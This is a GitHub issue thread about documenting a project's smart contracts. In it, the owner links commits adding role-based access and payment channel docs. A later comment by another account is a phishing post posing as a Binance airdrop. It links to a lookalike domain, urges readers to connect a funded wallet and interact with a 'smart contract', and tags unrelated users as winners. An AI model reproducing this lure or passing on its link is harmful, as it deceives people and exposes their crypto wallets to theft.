### ISSUE TITLE
Documentation  Phase

### ISSUE THREAD

**Issue by Astor** [swtch-labs/zero#14]
Add documentation of the latest smart contracts to the README.md and add the documentation for all the smart contracts and their methods.

**Comment by Astor** [comment]
Added the role based access documentation: https://github.com/Astor/zero/commit/0e4cef984548aebac215fa093a5354678b5b7fc7

**Comment by Astor** [comment]
Added the payment channel documentation: https://github.com/Astor/zero/commit/9ec2de31f716ba592391f44ab0a39a00c1e63837

**Comment by njangra144** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @mweinand, @serima, @dB2510, @pratiksolim, @sajibcse68, @OmarAbdo, @somayeh021
